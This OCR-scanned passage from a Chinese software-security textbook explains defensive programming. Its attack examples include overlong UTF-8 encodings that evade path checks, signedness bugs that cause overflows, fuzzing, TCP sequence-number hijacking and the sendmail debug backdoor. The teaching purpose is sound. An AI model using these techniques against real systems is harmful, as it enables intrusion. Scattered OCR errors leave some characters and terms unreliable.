制 值 “2F”。UTF-8 编码 允许 见 余 ， 承 认 更 长 的 编码 :“ C0 AF” 和 “E0 80AF”。 当 严格 使 用 
最 短 编码 时 ， 很 多 Unicode 解码 需 接 受 任 何 一 个 同等 有 效 的 序列 。 

下 面 我 们 讨论 验证 输入 的 时 候 使 用 多 重 编码 的 后 果 。 有 一 类 攻击 企图 给 脚本 提供 一 个 绝对 
路 径 下 的 文件 ， 实 际 上 需要 的 仅 是 一 个 简单 的 当前 路 径 下 的 文件 名 。 我 们 通常 检查 提供 的 文件 
名 不 以 “/ 开始， 或 者 不 包含 任何 “../” 上 一 级 路 径 的 表示 形式 。 但 如 果 此 处 的 检查 仅仅 假 
设 “/” 的 正确 编码 且 只 考虑 长 度 最 短 的 UTF-8 格式 的 话 ， 那 么 攻击 者 使 用 一 种 较 长 的 编码 就 
能 够 避 开 这 种 检查 。 这 样 精确 的 攻击 最 早 发 生 在 20 世纪 90 年 代 未 ， 针 对 的 是 Microsoft 的 IIS 
Web 服务 需 的 许多 版 本 。 当 程序 把 多 个 不 同 的 字符 当成 相同 字符 处 理 的 时 候 ， 就 会 出 现 一 个 问 
题 。 例 如 ， 忽 略 字母 的 重音 后 一 个 大 小 写 不 敏感 的 程序 能 产生 字母 A 的 30 种 等 价 表示 。 这 些 
例子 说 明 使 用 多 重 编码 会 出 现 问题 ， 检 查 危 险 的 数据 值 而 不 是 接受 已 知 的 安全 数据 也 会 出 现 问 
题 。 在 这 个 例子 中 ， 与 一 个 文件 名 的 安全 规范 进行 比较 ， 可 以 拒绝 一 些 实际 上 可 以 接受 的 使 用 
多 重 编码 的 文件 名 。 然 而 ， 它 的 确 能 够 拒绝 危险 的 输入 值 。 

由 于 多 重 编码 的 可 能 性 ， 因 此 输入 的 数据 必须 首先 转换 成 单一 的 、 标 准 的 、 最 小 的 表示 
形式 ， 这 个 过 程 称 为 规范 化 〈canonicalization)， 通 常用 一 个 通用 的 值 代替 那些 等 价 的 编码 。 一 
旦 完成 这 个 过 程 ， 输 入 的 数据 就 能 够 与 可 接受 的 输入 值 的 一 个 单一 表示 进行 比较 。 而 在 软件 当 
中 ， 需 要 检查 输入 和 输出 字段 的 量 可 能 会 非常 大 。[SIMP11] 和 其 他 一 些 阅 读 材 料 中 推荐 使 用 
anti-XSS 库 ， 或 者 带 有 集成 XSS 保护 的 Web 用 户 界 面 框架 ， 它 们 可 以 自动 完成 大 部 分 检查 过 
程 ， 而 不 必 为 每 个 字段 编写 检查 代码 。 

还 有 为 外 一 个 关注 点 就 是 ， 输 入 数据 代表 一 个 数字 数值 。 在 计算 机 上 这 样 的 值 是 用 固定 字 
长度 表 示 的 。 整 数 一 般 是 8、16、32 位 ， 现 在 是 64 位 ， 浮 点 数 可 以 是 32、64、96 位 ,或 者 
是 其 他 的 位 数 ， 这 依赖 于 使 用 的 计算 机 处 理 器 。 这 些 值 可 能 是 有 符号 的 ， 也 可 能 是 无 符号 的 。 
当 对 输入 数据 进行 解释 的 时 候 ， 包 括 可 选 的 符号 、 清 零 、 十 进 制 值 和 乘 方 以 及 数字 数值 的 各 种 
表示 都 必须 准确 处 理 ， 数 值 数 据 的 后 续 使 用 也 必须 受到 监控 。 一 种 类 型 的 数据 强制 转换 成 另 一 
种 类 型 的 数据 可 能 发 生 问 题 。 例 如 ， 一 个 缓冲 区 长 度 可 以 用 一 个 无 符号 整数 表示 ， 它 将 要 和 
一 个 可 接受 的 最 大 缓冲 区 长 度 进行 比较 ， 在 比较 的 时 候 无 符号 值 可 以 转换 成 一 个 有 符号 值 来 
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处 理 ， 不 同 的 语言 可 能 有 不 同 的 处 理 方式 。 这 就 导致 一 个 漏洞 ， 因 为 负数 的 最 高 位 为 1， 但 是 
最 高 位 为 1 的 无 符号 整数 又 是 一 个 较 大 的 正 数 值 。 这 样 攻击 者 就 能 指定 一 个 很 大 的 输入 长 度 ， 
这 个 很 大 的 无 符号 型 输入 长 度 在 与 缓冲 区 的 最 大 长 度 进行 比较 的 时 候 是 作为 负数 处 理 的 。 一 
个 负数 明显 小 于 一 个 较 小 的 正 数 ， 这 说 明 比 较 是 成 功 的 。 然 而 ， 使 用 缓冲 区 的 时 候 输入 数据 
将 会 超出 缓冲 区 的 实际 范围 ， 对 输入 数据 的 错误 处 理 就 产生 了 缓冲 区 溢出 。 在 这 里 我 们 再 次 
强调 一 定 要 仔细 检查 对 输入 数值 的 所 有 假设 ,确保 所 有 的 使 用 与 假设 一 致 。 


11.2.4 ”输入 的 fuzzing 技术 


很 明显 ， 预 测 并 测试 攻击 者 可 能 用 以 暗中 破坏 程序 的 所 有 可 能 的 非 标准 输入 类 型 是 很 困难 
的 。1989 年 Wisconsin Madison 大 学 的 Barton Miller 教授 研制 出 一 个 功能 强大 的 fuzzing FEA, 
这 是 一 个 软件 测试 技术 ， 它 使 用 随机 产生 的 数据 作为 程序 的 输入 进行 测试 。 测 试 的 输入 范围 很 

372) 大 ,包括 直接 的 文本 或 者 图 形 输入 、 在 一 个 Web 和 其 他 的 分 布 式 服务 上 发 出 的 随机 网 络 请 求 ， 
以 及 传递 给 标准 库 范 数 或 者 系统 函数 的 随机 参数 值 。 测 试 的 目的 在 于 确定 程序 或 者 函数 是 否 能 
够 正确 处 理 所 有 的 非 正 党 输入、 程序 是 否 受 到 破坏 ， 以 及 程序 失败 以 后 是 否 得 到 正确 啊 应 。 在 
后 面 的 情形 中 程序 或 者 函数 明显 存在 一 个 需要 纠正 的 bug。 对 任意 的 程序 、 服 务 或 者 函数 的 输 
入 假设 来 说 ，fuzzing 技术 的 主要 优点 就 是 简单 和 自由 。 而 且 产 生 大 量 测试 的 费用 非常 低 。 而 
是 这 样 的 测试 可 以 帮助 程序 识别 它 的 可 靠 性 和 安全 性 。 

尽管 输入 数据 能 够 完全 随机 产生 ， 它 也 能 依据 一 些 模板 随机 产生 。 可 以 设计 这 样 的 模板 
来 检查 可 能 存在 的 bug， 例 如 ， 可 能 包括 特别 长 的 输入 或 者 不 包含 空格 和 其 他 字 边 界 ( word 
boundary) 的 文本 输入 。 当 和 网 络 协议 一 起 使 用 的 时 候 ， 该 模板 可 以 明确 针对 这 个 协议 的 重要 
方面 。 使 用 模板 的 目的 本 是 为 了 提高 检 出 bug 的 可 能 性 ,但 是 缺点 在 于 把 模板 混入 了 输入 假设 
中 ， 因 此 通过 其 他 形式 输入 的 数据 触发 的 bug 可 能 不 会 被 检测 到 。 我 们 建议 将 这 些 方法 组 合 起 
来 使 用 ， 对 所 有 的 输入 进行 合理 的 全 面 覆 盖 。 

Miller 教授 的 团队 ， 已 经 应 用 fuzzing 技术 测试 了 很 多 常用 的 操作 系统 和 应 用 程序 ， 包 括 
运行 在 Linux、Windows NT 和 最 近 的 Mac OS X 系统 上 的 常见 的 命令 行 和 图 形 用 户 界 面 。 最 后 
的 测试 结果 总 结 在 [MILL07] 中 ， 该 结果 指出 了 这 些 系统 中 很 多 程序 存在 的 bug。 其 他 机 构 在 
各 种 系统 和 软件 中 已 经 使 用 了 这 些 测试 。 

尽管 fuzzing 技术 从 概念 上 讲 是 一 个 非常 简单 的 测试 方法 ， 但 它 也 有 局 限 性 。 一 般 而 言 ， 
fuzzing 技术 仅 能 识别 简单 类 型 的 输入 错误 ， 如 果 一 个 bug 仅仅 在 极 特殊 的 输入 下 才能 够 触发 ， 
fuzzing 技术 就 不 太 可 能 找到 它 。 但 是 这 种 类 型 的 bug 又 经 常 是 特别 严重 的 ， 非 常 容易 受到 攻 
击 。 因 此 fuzzing 技术 应 该 作为 合理 的 全 面 测试 策略 的 一 部 分 被 采用 。 

目前 很 多 能 够 进行 fuzzing 测试 的 工具 都 是 非常 有 效 的 ， 很 多 的 机 构 和 个 人 都 使 用 这 些 工 
具 评价 程序 和 应 用 的 安全 性 。 它 们 可 以 对 命令 行 参数 、 环 境 变 量 、Web 应 用 、 文 件 格式 、 网 
络 协议 和 各 种 形式 的 进程 间 通 信使 用 fuzzing 技术 进行 测试 。 许 多 相关 的 黑 盒 检测 工具 ， 包 
括 fuzzing 检测 在 内 ， 在 [MIRA05] 中 都 有 描述 。 许 多 机 构 使 用 这 些 工具 提高 了 软件 的 安全 性 ， 
而 攻击 者 使 用 fuzzing 技术 也 可 识别 第 用 软件 中 可 利用 的 bug。 因 此 对 开发 者 和 维护 者 来 说 ， 
fuzzing 技术 变 得 越 来 越 重要 ， 他 们 可 以 在 攻击 者 发 现 和 攻击 bug 之 前 找到 并 上 且 改正 这 些 bug. 


11.3 ”编写 安全 程序 代码 


我 们 的 计算 机 程序 模型 的 第 二 大 组 件 是 依据 一 些 算法 处 理 输入 数据 。 对 过 程 化 的 语言 像 C 语 
言 和 它 派 生 的 语言 来 说 ， 计 算 机 算法 指定 了 从 处 理 输入 开始 的 一 系列 步 又， 以 解决 需要 解决 的 问 
B73| 题 ， 高 级 程序 语言 经 过 编译 和 链接 成 为 可 以 直接 在 目标 处 理 器 上 执行 的 机 器 代码 ,在 10.1 节 我 们 
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讨论 了 执行 程序 使 用 的 典型 的 过 程 化 结构 ; 另外 ， 高 级 语言 ， 例 如 Java， 可 以 被 编译 成 为 一 种 中 
间 语 言 ， 该 中 间 语 言 能 够 在 目标 系统 上 被 一 些 程序 进行 解释 。 使 用 解释 型 的 脚本 语言 编写 的 程序 
同样 可 以 完成 这 个 工作 。 不 管 是 哪 种 情形 ， 一 个 程序 的 执行 就 是 机 天 指令 的 运行 ， 在 执行 的 过 程 
中 处 理 器 实现 了 某 种 算法 。 这 些 指令 将 处 理 存 储 在 内 存 的 不 同 区 域 和 处 理 需 寄存 右 中 的 数据 。 

从 软件 安全 的 前 景 看 ， 还 存在 一 些 关 键 问 题 : 实现 的 算法 是 否 能 够 正确 解决 指定 的 问题 ; 
执行 的 机 器 指令 是 否 正确 体现 了 高 级 算法 的 规范 ; 对 存储 在 机 禹 的 寄存 天 或 者 内 存 中 的 变量 的 
处 理 是 否 有 效 和 有 意义 。 


11.3.1 算法 的 正确 实现 


第 一 个 关键 问题 是 一 个 良好 的 程序 开发 技术 中 最 主要 的 问题 之 一 。 如 果 一 个 算法 没有 正确 
实现 问题 的 所 有 情形 和 变化 ， 这 就 可 能 允许 一 些 似乎 合法 的 程序 输入 触发 一 些 程序 行为 ， 而 这 
些 程序 行为 并 不 是 程序 应 该 完成 的 ， 因 而 给 攻击 者 提供 了 一 些 其 他 的 能 力 。 这 个 错误 可 能 是 由 
于 对 程序 输入 不 合适 的 解释 或 者 处 理 造 成 的 ， 正 如 我 们 在 11.2 节 讨 论 的 那样 ， 但 它 也 可 能 是 
对 本 来 有 效 的 输入 没有 进行 适当 处 理 引起 的 。 在 算法 的 设计 或 者 实现 过 程 中 存在 这 些 不 足 ， 最 
终 导 致 程序 受到 攻击 。 

这 方面 比较 好 的 例子 是 在 Netscape Web 浏览 旭 的 一 些 早期 版 本 中 发 现 的 bug. Mae AY 
随机 数 发 生 器 为 可 靠 的 Web 连接 产生 会 话 密 钥 ， 而 发 生 带 的 实现 是 不 理想 的 [GOWA01]。 E 
本 来 假设 这 些 数字 是 不 易 猜 测 的 短 整 型 数 。 然 而 ， 由 于 这 个 算法 所 使 用 的 种 子 的 可 选 信 息 很 
少 ， 造 成 这 些 数 字 相 当 容 易 猜 测 。 因 此 ， 攻 击 者 可 能 猜 到 一 个 可 靠 的 Web 会 话 使 用 的 密 钥 并 
且 破 译 出 交换 的 数据 。 解 决 的 方法 就 是 重新 实现 随机 数 发 生 器 ， 确 保 算法 使 用 的 种 子 具有 充足 
的 、 不 易 猜测 的 信息 ， 这 样 攻击 者 就 不 可 能 猜 到 密 钥 。 

另 一 个 众所周知 的 例子 是 TCP 会 话 欺 骗 (spoof) 或 者 hijack 攻击 。 这 个 例子 扩展 了 我 
们 在 7.1 节 中 讨论 的 发 送 一 个 伪造 的 数据 包 到 一 个 TCP 服务 器 的 概念 。 这 次 攻击 的 目标 不 是 
使 服务 器 处 于 半 开 放 连 接 状 态 ， 而 是 欺骗 服务 器 接受 伪造 源 地 址 的 数据 包 ， 其 中 源 地 址 属于 
可 信和 的 主机 但 数据 包 却 源 于 攻击 者 的 系统 。 如 果 攻 击 成 功 ， 就 会 说 服 服务 器 运行 一 些 命令 
或 者 提供 数据 访问 ， 前 提 是 这 些 服务 是 允许 提供 给 可 信 主 机 的 。 为 了 理解 这 次 攻击 的 需求 ， 
我 们 考虑 图 7-2 中 显示 的 TCP 三 次 握手 连接 。 我 们 回想 一 下 ， 由 于 使 用 一 个 伪造 的 源 地 址 ， 
攻击 者 没有 看 到 来 自 服务 器 的 响应 ， 所 以 他 们 不 知道 服务 器 提供 的 初始 序列 号 。 然 而 ， 如 果 
攻击 者 能 够 正确 猜 到 这 个 数字 ， 就 可 以 建立 一 个 ACK 包 发 送 到 服务 器 ， 接 下 来 假定 与 服务 
器 的 连接 已 经 建立 。 服 务 器 认为 任何 后 续 的 数据 包 都 来 源 于 可 信 的 主机 ， 并 按照 其 分 配 的 权 
限 处 理 这 些 数据 。 这 次 攻击 的 hijack 变量 一 直 等 待 ， 直 到 一 些 授权 的 外 部 用 户 连接 并 登录 
服务 器 。 接 下 来 攻击 者 尝试 猜测 序列 号 ， 使 用 伪造 的 内 容 模仿 授权 用 户 发 给 服务 需 的 下 一 个 
数据 包 ， 并 将 其 发 送 到 服务 器 。 如 果 猜 测 的 数字 正确 ， 攻 击 者 使 用 授权 用 户 的 访问 权限 和 访 
问 许可 发 出 任何 请 求 ， 服 务 器 都 会 响应 。 对 这 些 攻击 来 说 还 有 另外 一 个 麻烦 的 问题 ， 任 何 来 
自 服 务 器 的 响应 都 被 发 送 到 伪造 地 址 所 在 的 系统 中 。 由 于 可 信和 主机 确认 服务 器 没有 发 送 数据 
包 ， 这 个 系统 就 假设 存在 一 个 网 络 错误 并 发 送 一 个 reset (RST) 数据 包 中 断 这 次 连接 。 攻 击 
者 必须 确保 ， 在 可 信和 主机 系统 发 送 中 断 之 前 将 攻击 数据 包 发 送 到 服务 器 并 且 被 处 理 ， 攻 击 者 
在 攻击 目标 服务 器 的 同时 向 可 信 主 机 系统 发 出 一 个 拒绝 服务 ( denial-of-service) 攻击 ， 就 可 
以 达到 这 个 目的 。 

由 于 很 多 TCP/IP 的 实现 所 使 用 的 初始 序列 号 都 容易 猜测 ， 这 一 实现 缺陷 为 这 些 攻 击 提供 
了 机 会 。 另 外 ， 使 用 序列 号 能 够 识别 一 个 会 话 的 所 有 数据 包 。TCP/P 的 标准 规定 每 一 次 连接 
使 用 一 个 新 的 、 不 同 的 序列 号 ， 这 样 就 能 够 区 分 以 前 连接 的 数据 包 ， 这 个 序列 号 可 能 是 一 个 随 
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机 数 (服从 某 些 约束 条 件 )。 很 多 TCP 的 实现 使 用 非常 容易 预测 的 算法 来 产生 下 一 个 初始 序列 
号 。 攻 击 者 把 这 些 隐 含 使 用 的 序列 号 组 合 在 一 起 作为 一 个 TCP 会 话 数据 包 的 鉴别 左 和 认证 器 。 
一 旦 这 些 工作 失败 ， 就 容易 预测 到 这 些 序列 号 ， 攻 击 就 会 发 生 。 很 多 新 发 行 的 操作 系统 现在 都 
支持 随机 的 初始 序列 号 ， 这 些 系统 对 这 类 攻击 具有 人 免疫 能 力 。 

程序 员 经 常 在 程序 中 故意 设置 一 些 用 于 检测 和 调试 的 代码 ， 这 是 这 个 问题 的 另 一 种 表现 形 
式 。 尽 管 在 程序 开发 过 程 中 设置 一 些 代 码 是 有 效 的 ， 但 在 程序 的 产品 发 行 版 中 也 会 经 常 遗 留 下 
这 些 代码 。 至 少 ， 这 些 代 码 会 将 一 些 不 合适 的 信息 透露 给 使 用 该 程序 的 用 户 。 在 最 坏 情况 下 ， 
它 允 许 用 户 绕 过 安全 检查 或 者 程序 的 其 他 限制 ， 完 成 其 他 一 些 不 允许 完成 的 动作 。 这 类 漏洞 可 
以 在 邮件 投递 程序 sendmail 中 看 到 ，20 世纪 80 年 代 末 著名 的 Morris Internet 蠕虫 攻击 的 就 是 
这 个 程序 。sendmail 的 开发 者 在 程序 中 保留 了 一 些 这 样 的 代码 ， 该 代码 支持 一 个 DEBUG 命令 ， 
这 个 命令 允许 用 户 远 程 查 询 和 控制 正在 运行 的 程序 [SPAF89]。 蠕 虫 使 用 这 个 特征 感染 正在 运 
ÍT sendmail 的 系统 ， 因 为 程序 sendmail 使 用 超级 用 户 权 限 运 行 ， 它 可 以 不 受 限 制 地 访问 系统 ， 
改变 系统 信息 ， 因 而 使 问题 变 得 非常 严重 。 我 们 将 在 11.4 节 进 一 步 讨 论 特权 最 小 化 问题 。 

一 个 更 进一步 的 例子 涉及 高 级 语言 或 者 中 级 语言 解释 器 的 实现 。 其 假设 是 解释 器 可 以 正确 
实现 特定 的 程序 代码 。 语 言语 法 分 析 失 败 会 导致 bug 的 出 现 ， 这 些 bug 可 能 被 攻击 者 利用 。 一 
些 早期 的 Java EIMEL (JVM) 的 实现 没有 充分 进行 安全 检查 ， 特 别 是 对 远程 的 源 代码 ， 例 如 在 
applets 中 [DEFW96] 我 们 可 以 明显 看 到 。 这 些 实现 允许 攻击 者 远程 传递 代码 ， 例 如 在 Web 页 
E, 但 是 JVM 解释 器 像 对待 本 地 资源 一 样 处 理 这 些 远程 代码 ， 因 而 这 些 代 码 可 以 访问 更 多 的 
本 地 系统 资源 和 数据 资源 。 

上 面 这 些 例子 说 明 设计 和 实现 一 个 程序 需要 认真 仔细 。 仔 细 分 析 假 设 是 非常 重要 的 ， 例 
如 ， 为 保证 通过 程序 代码 产生 的 这 些 假 设 达到 令 人 满意 的 程度 ， 生 成 的 随机 数 实际 上 就 必须 要 
不 容易 被 预测 。 传 统 意 义 上 ， 这 些 作为 设计 目标 和 代码 注释 的 规范 与 检查 都 是 非 正式 的 。 而 另 
一 种 方法 就 是 在 软件 开发 和 分 析 中 使 用 正式 的 方法 以 确保 软件 在 构建 过 程 中 都 是 正确 无 误 的 . 
这 种 正式 的 方法 很 早 就 为 众人 所 知 了 ， 但 是 大 家 都 认为 其 太 过 复杂 从 而 难以 普遍 地 应 用 于 各 个 
领域 ， 当 然 ， 其 仍 适 用 于 一 些 特殊 场景 ， 可 信 计 算 系 统 的 开发 就 是 其 中 一 个 ， 我 们 后 续 将 在 第 
27 章 中 进一步 讨论 这 个 问题 。 然 而 ，NISTIR 8151 中 提 到 这 种 情况 正在 转变 ， 并 将 进一步 鼓励 
其 后 续 发 展 和 更 加 广泛 的 使 用 。 识 别 程序 在 调试 和 测试 时 使 用 的 扩展 代码 ， 保 证 在 程序 发 布 和 
使 用 之 前 将 这 些 内 容 移 除 或 者 禁用 ， 这 也 是 非常 重要 的 。 


11.3.2 保证 机 器 语言 与 算法 一 致 


第 二 个 关键 问题 涉及 在 一 些 程序 设计 语言 中 指定 的 算法 和 实现 这 个 算法 所 运行 的 机 器 指令 
之 间 的 一 致 性 ， 这 个 问题 是 大 多 数 程 序 员 最 容易 忽略 的 问题 。 其 假设 是 编译 器 或 者 解释 器 能 真 
正 产生 或 执行 可 以 有 效 实现 语言 语句 的 代码 。 当 考虑 这 个 假设 时 ， 这 个 问题 明显 是 效率 问题 之 
一 ， 它 通常 是 通过 指定 最 优化 标志 需要 的 级 别 给 编译 器 来 处 理 。 

关于 被 编译 的 语言 ， 正 如 Ken Thompon 在 [THOM84] 提出 的 那样 ， 一 个 恶意 的 编译 器 ， 
程序 员 能 够 在 其 中 包含 一 些 指 令 ， 当 它 处 理 一 些 特殊 的 输入 语句 的 时 候 触发 附加 的 代码 。 这 些 
语句 甚至 包含 了 部 分 编译 程序 ， 所 以 当 编译 器 源 代码 被 编译 的 时 候 ， 即 使 在 从 编译 器 源 代 码 中 
移 除 所 有 附加 的 代码 之 后 也 能 重新 插入 这 些 变化 。 如 果 这 样 做 了 ， 这 些 变 化 的 唯一 证 据 只 能 在 
机 器 代码 中 找到 。 但 是 需要 仔细 比较 产生 的 机 器 代码 与 原来 的 源 代码 才能 发 现 这 些 变 化 。 一 个 
较 大 的 程序 ， 其 中 包含 很 多 源 文 件 ， 如 果 进 行 比较 将 是 一 个 极 慢 而 又 困难 的 任务 ， 一 般 来 说 ， 
没有 人 愿意 这 样 做 。 

具备 较 高 保险 级 别 的 可 信 计 算 机 系统 的 开发 是 需要 这 个 级 别 的 检查 的 一 个 领域 。 特 别 是 使 
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用 公共 标准 保险 级 别 EAL 7 的 计算 机 系统 安全 认证 就 需要 验证 在 设计 、 源 代码 以 及 目标 代码 
之 间 的 一 致 性 。 我 们 将 在 第 27 章 详细 讨论 这 个 问题 。 


11.3.3 ”数据 值 的 正确 解释 


下 一 个 关键 问题 涉及 数据 值 的 正确 解释 。 在 计算 机 的 最 底层 ， 所 有 的 数据 都 是 以 二 进 制 位 
组 的 形式 进行 存储 的 。 这 些 数据 存储 在 内 存 的 字 节 中 ， 而 这 些 字 节 会 形成 一 个 较 大 的 存储 单 
元 ， 如 一 个 字 (word) 或 者 长 字 (longword)。 这 些 数据 可 以 在 内 存 中 被 访问 和 处 理 ， 也 可 以 在 
使 用 之 前 拷贝 到 处 理 器 寄存 器 中 。 一 个 特定 的 比特 组 可 以 解释 为 一 个 字符 、 一 个 整数 、 一 个 浮 
点 数 、 一 个 内 存 地 址 (指针 )， 还 可 以 是 一 些 更 复杂 的 解释 。 这 些 解释 依赖 于 处 理 它 的 程序 操 
作 ， 但 是 最 终 依 赖 于 执行 的 具体 机 堪 指 令 。 不 同 的 程序 语言 提供 了 不 同 的 能 力 ， 限 制 和 验证 对 
变量 的 数据 解释 做 出 的 各 种 假设 。 如 果 程 序 语言 包含 较 强 的 数据 类 型 ， 那 么 在 任何 一 个 特殊 类 
型 的 数据 上 完成 的 操作 都 将 被 限定 为 数值 的 适当 处 理 9。 这 将 极 大 减少 程序 中 出 现 不 恰当 操作 
的 可 能 性 ， 也 将 减少 程序 中 由 于 使 用 变量 引入 错误 的 可 能 。 可 是 其 他 一 些 语 言 接受 比较 目 由 的 
数据 解释 ， 人 允许 程序 代码 明显 改变 对 数据 值 的 解释 ， 广泛 使 用 的 C 语 言 就 具有 这 个 特性 ， 正 
如 我 们 在 10.1 节 讨 论 的 。 特 别 是 将 一 个 变量 的 值 解释 为 整数 或 者 内 存 地 址 (指针 ) 都 可 以 , 在 
它们 之 间 进 行 转换 非常 容易 。 这 是 在 C 语言 的 结构 和 机 器 语 言 指令 的 性 能 之 间 存 在 紧密 联系 
的 结果 ， 并 且 对 系统 级 别 的 程序 设计 来 说 该 种 做 法 提供 了 极 大 的 方便 。 然 而 ， 它 也 容易 由 于 指 
针 的 使 用 和 不 恰当 的 操作 而 产生 许多 错误 ， 正 如 我 们 在 第 10 章 讨 论 的 ， 绥 冲 区 溢出 就 是 这 样 
的 原因 造成 的 错误 。 这 里 还 有 一 个 相似 的 问题 会 引起 错误 的 发 生 ， 那 就 是 由 于 对 复杂 数据 结构 
中 指针 的 不 正确 处 理 ， 例 如 链表 或 树 ， 都 会 导致 结构 的 破坏 或 者 数值 的 改变 。 任 何 这 样 的 程序 
设计 bug 都 可 能 给 攻击 者 提供 一 种 方式 ， 来 破坏 程序 的 正确 操作 ， 或 者 使 程序 谣 溃 。 

针对 这 些 错误 ， 最 好 的 防御 方法 是 使 用 具有 较 强 类 型 的 编程 语言 。 然 而 ， 即 使 主 程序 使 
用 这 样 的 语言 进行 编写 ,但 是 它 还 是 需要 访问 和 使 用 操作 系统 的 服务 和 标准 库 荫 数 ， 而 这 些 
服务 和 函数 大 多 数 又 都 是 使 用 像 C 语言 一 样 的 程序 设计 语言 编写 的 ， 所 以 它们 都 可 能 存在 漏 
洞 。 唯 一 的 办 法 就 是 监控 在 系统 的 使 用 过 程 中 已 经 发 现 的 那些 bug， 或 者 不 去 使 用 那些 存在 严 
重 bug 的 库 函 数 。 如 果 使 用 了 一 种 松散 类 型 的 语言 (loosely typed language )， 比 如 C 语言 ,我 
们 就 必须 仔细 处 理 在 各 种 数据 类 型 之 间 强 制 转 换 的 数据 ， 在 使 用 时 保证 它们 都 是 有 效 的 。 


11.3.4 内存 的 正确 使 用 


与 数据 值 的 解释 相关 的 一 个 问题 是 内 存 的 动态 分 配 和 管理 ， 其 一 般 用 于 堆 的 处 理 。 在 操作 
未 知 长 度 的 数据 时 ， 很 多 程序 使 用 动态 分 配 的 方法 存储 数据 。 程 序 需 要 使 用 内 存 的 时 候 就 动态 
分 配 ， 使 用 之 后 随即 释放 。 如 果 一 个 程序 没有 正确 管理 这 个 过 程 ， 后 果 可 能 是 堆 区 的 可 用 内 存 
逐步 减少 ， 直 至 完全 用 尽 。 这 被 称 为 内 存 泄漏 (memory leak), 一 旦 堆 区 的 可 用 内 存 用 尽 ， 程 
序 将 会 月 溃 。 这 给 攻击 者 提供 了 一 个 明显 的 机 制 ， 可 以 在 这 样 的 程序 中 实现 拒绝 服务 攻击 。 

很 多 早期 的 语言 ， 包括 C 语言 ， 对 动态 分 配 内 存 没 有 提供 明确 的 支持 ， 它 们 通过 调用 标 
准 库 函 数 的 形式 分 配 和 释放 内 存 。 然 而 ， 对 于 大 型 的 、 复 杂 的 程序 来 讲 ， 准 确 地 确定 何 时 不 再 
需要 动态 分 配 内 存 ， 是 一 项 非常 困难 的 任务 。 因 此 在 这 些 程序 里 内 存 泄漏 很 容易 发 生 ， 但 是 确 
定 和 改正 内 存 泄漏 却 很 困难 。 有 很 多 不 同 的 库 变 量 能 够 对 这 样 的 内 存 分 配 实现 更 高 级 别 的 检查 
和 调试 ， 它 们 可 以 用 于 辅助 这 个 过 程 。 

像 Java 和 CH 等 语言 都 是 自动 管理 内 存 的 分 配 和 和 释放。 虽然 这 些 语言 因 文 持 这 种 目 动 管 


日 ”提供 的 编译 器 或 者 解释 器 在 将 高 级 语言 语句 翻译 为 直接 执行 的 机 器 指令 过 程 中 没有 包含 任何 bug。 
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理会 引起 运行 方面 的 开销 ,但 结果 却 使 得 程序 更 可 靠 。 使 用 这 些 语言 的 目的 是 鼓励 避 开 内 存 管 
理 问 题 。 


11.3.5 ”阻止 共享 内 存 竞争 条 件 的 产生 


男 一 个 我 们 关心 的 问题 是 多 个 进程 或 一 个 进程 的 多 个 线程 访问 通用 共享 内 存 的 管理 。 如 果 
没有 恰当 的 访问 同步 机 制 ， 那么 这 些 进程 或 线程 由 于 重 全 访问、 使 用 和 替代 共享 值 ， 就 可 能 导 
致 数据 值 被 破坏 或 修改 丢失 。 当 多 个 进程 或 线程 通过 竞争 来 获取 对 一 些 资源 的 未 加 控制 的 访问 
时 ， 会 导致 竞争 条 件 ( race condition) 的 发 生 。 这 是 一 个 众所周知 的 并 用 文档 记录 的 问题 ， 当 
编写 并 发 代码 时 ， 这 个 问题 就 出 现 了 。 该 问题 的 解决 方法 是 需要 正确 选择 和 使 用 适当 的 同步 原 
语 。 即 使 这 样 ， 也 不 容易 找到 最 合适 和 有 效 的 选择 。 如 果 我 们 选择 了 不 正确 的 同步 原 语 序列 ， 
就 有 可 能 造成 各 种 进程 或 线程 的 死 锁 ( deadlock)， 这 时 每 个 进程 或 线程 都 在 等 待 访问 一 个 资 
源 ， 而 这 个 资源 正在 被 其 他 的 进程 或 线程 访问 。 如 果 不 中 断 其 中 的 一 个 或 者 多 个 程序 ， 就 没有 
更 简单 的 方法 从 死 锁 中 恢复 。 攻 击 者 能 够 在 存在 漏 润 的 程序 里 触发 一 个 死 锁 ， 实 现 拒 绝 服务 攻 
击 。 在 大 型 的 复杂 应 用 程序 中 ， 程序 员 保 证 不 发 生死 锁 是 很 困难 的 。 他 们 需要 仔细 设计 和 分 解 
问题 ， 限 制 访问 共 至 内 存 的 区 域 ， 并 确定 使 用 最 好 的 原 语 。 


11.4 与 操作 系统 和 其 他 程序 进行 交互 


我 们 的 计算 机 程序 模型 的 第 三 个 组 件 ， 是 程序 在 操作 系统 的 控制 下 在 计算 机 系统 上 执行 。 
这 个 问题 在 初级 的 编程 课程 中 通常 不 被 重视 。 然 而 ， 从 编写 安全 软件 的 角度 来 看 ， 这 是 很 重要 
的 问题 。 一 般 而 言 ， 除 了 专用 的 嵌入 式 程序 ， 在 大 多 数 计算 机 系统 上 ， 程 序 并 不 是 孤立 地 运 
行 ， 而 是 在 操作 系统 的 控制 下 运行 。 操 作 系 统管 理 着 该 程序 对 系统 资源 的 访问 ， 实 现 系统 资源 
在 所 有 并 发 执行 的 程序 间 共 享 。 

如 图 10-4 所 示 ， 当 一 个 程序 运行 时 ， 操 作 系 统 构 造 一 个 进程 的 执行 环境 。 除 了 程序 代码 
和 程序 使 用 的 数据 外 ， 该 进程 还 包括 一 些 操作 系统 提供 的 信息 。 这 些 信 息 包括 用 来 适应 程序 操 
作 的 环境 变量 ， 以 及 为 该 程序 指定 的 命令 行 参 数 。 所 有 这 些 数据 应 被 视 为 程序 的 外 部 输入 ， 所 
以 在 使 用 它们 之 前 必须 保证 其 有 效 性 ， 正 如 我 们 在 11.2 节 中 讨论 的 。 

一 般 而 言 ， 这 些 计算 机 系统 都 支持 多 用 户 。 像 文件 和 设备 等 资源 都 被 一 个 用 户 所 拥有 ， 针 
对 不 同 种 类 的 用 户 分 配 不 同 的 访问 权限 。 在 第 4 章 中 我 们 深入 地 讨论 了 这 些 概 念 。 从 软件 安全 
的 角度 讲 ， 程 序 通 常 需要 访问 多 种 资源 ， 如 文件 和 设备 等 。 除 非 被 授予 适当 的 访问 权限 ,否则 
程序 就 可 能 失败 。 然 而 ， 权 限 过 滥 也 是 很 危险 的 ， 因 为 程序 的 任何 bug 都 可 能 潜在 威胁 系统 的 
更 多 部 分 。 

当 多 个 程序 同时 访问 共享 资源 时 ， 例 如 访问 公共 文件 ， 也 需要 考虑 一 些 安全 问题 。 这 是 我 
